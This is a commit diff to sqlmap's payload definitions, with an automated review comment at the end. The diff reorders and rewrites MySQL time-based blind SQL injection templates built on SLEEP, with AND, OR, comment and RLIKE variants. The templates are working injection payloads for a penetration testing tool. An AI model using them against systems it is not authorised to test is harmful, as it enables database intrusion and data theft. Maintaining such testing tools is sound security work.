Minor revisiting of MySQL time-based payloads

This commit is contained in:
Miroslav Stampar 2019-05-20 12:41:41 +02:00
parent 79d0c83f8f
commit e1ab969fce
2 changed files with 99 additions and 97 deletions


@ -18,7 +18,7 @@ from lib.core.enums import OS
from thirdparty.six import unichr as _unichr from thirdparty.six import unichr as _unichr
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.3.5.114" VERSION = "1.3.5.115"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)


@ -2,98 +2,18 @@
<root> <root>
<!-- Time-based boolean tests --> <!-- Time-based boolean tests -->
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>OR SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>OR SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
<test> <test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title> <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,8,9</clause> <clause>1,2,3,8,9</clause>
<where>1</where> <where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>
@ -107,13 +27,95 @@
<test> <test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title> <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
<stype>5</stype> <stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>
<stype>5</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request> <request>
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>OR SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>OR SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>
@ -131,9 +133,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
@ -152,9 +154,9 @@
<risk>3</risk> <risk>3</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
@ -296,9 +298,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>
@ -316,9 +318,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
@ -1490,9 +1492,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>
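Review bot: The motivation for replacing `SELECT *` with `SELECT [RANDNUM]` in the derived-table vectors is not recorded anywhere in the file: it first appears in the `<vector>`/`<payload>` lines of the "AND time-based blind (query SLEEP)" test in the first hunk of this file and is repeated in the five later hunks (the comment variants, the RLIKE variants and the `<where>3</where>` variant), but the only explanatory comment nearby covers a different decision, namely why the query-SLEEP tests are now ranked ahead of the plain SLEEP ones. A one-line XML comment above that first test stating why the literal column form is used would stop the next maintainer from reverting it as cosmetic; the reason cannot be inferred from this page, so the wording has to come from the author. If the new explanatory comment is on the added side, as the reordering suggests, its spelling should also be corrected from `Prefering` to `Preferring`. The `<test>` element opened in each of these hunks closes outside the hunk, so the swapped `<level>` values (query SLEEP 2 → 1, plain SLEEP 1 → 2) can only be checked for consistency against the full file.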